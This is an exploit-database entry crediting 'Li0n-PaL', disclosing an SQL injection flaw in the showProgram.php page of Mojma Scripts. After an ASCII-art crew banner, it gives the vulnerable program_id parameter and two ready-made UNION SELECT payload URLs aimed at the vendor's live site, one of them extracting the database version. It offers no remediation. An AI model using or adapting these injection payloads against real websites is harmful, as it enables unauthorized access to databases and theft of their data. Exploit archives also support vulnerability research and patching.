Mojma Scripts (ShowProgram.php) SQL Injection Vulnerability

2010-04-17T00:00:00
ID 1337DAY-ID-11845
Type zdt
Reporter Li0n-PaL
Modified 2010-04-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
Mojma Scripts (ShowProgram.php) SQL Injection Vulnerability
===========================================================

  @                                        www.Pal-Li0ns.com/cc                                             @
  @                                                                                                         @
  @          @@@@@@       @@@@@@@@@    @@               @@         @@    @@@@@@@@@@  @@@         @@         @
  @          @@    @      @@     @@    @@               @@         @@    @@      @@  @@ @        @@         @
  @          @@     @     @@     @@    @@               @@         @@    @@      @@  @@  @       @@         @
  @          @@    @      @@     @@    @@               @@         @@    @@      @@  @@   @      @@         @
  @          @@   @       @@     @@    @@               @@         @@    @@      @@  @@    @     @@         @
  @          @@@ @        @@@@@@@@@    @@    @@@@@@@@   @@         @@    @@      @@  @@     @    @@         @
  @          @@           @@     @@    @@    @@@@@@@@   @@         @@    @@      @@  @@      @   @@         @
  @          @@           @@     @@    @@               @@         @@    @@      @@  @@       @  @@         @
  @          @@           @@     @@    @@               @@         @@    @@      @@  @@        @ @@         @
  @          @@           @@     @@    @@@@@@@@@        @@@@@@@@@  @@    @@@@@@@@@@  @@         @@@         @
  @                                            ./Pal-Li0ns CreW                                                 @
  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+===================================================================================+
[?]Mojma Scripts [ShowProgram.php] SQL Injection 
+===================================================================================+
    [?] My home:            [http://Pal-Li0ns.com/cc           ]
    [?] For Ask:              [[email protected]]
    [?] Script:                 [     Mojma Scripts                     ]
    [?] home Script        [ http://www.mojma.com ]
    [?] Language:          [ PHP ]
    [?] Founder:              [ Li0n-PaL ]
    [?] Gr44tz to:             [ Pal-Li0n - Red-D3v1L - All Pal-Li0ns CreW ]

===[ Exploit  ]===
http://www.localhost/showProgram.php?program_id=[SQL]

Example #~

http://www.mojma.com/showProgram.php?program_id=-14+union+select+1,2,3--
http://www.mojma.com/showProgram.php?program_id=-14+union+select+1,version%28%29,3--

---------------------------------------------------------

./exit



#  0day.today [2018-04-09]  #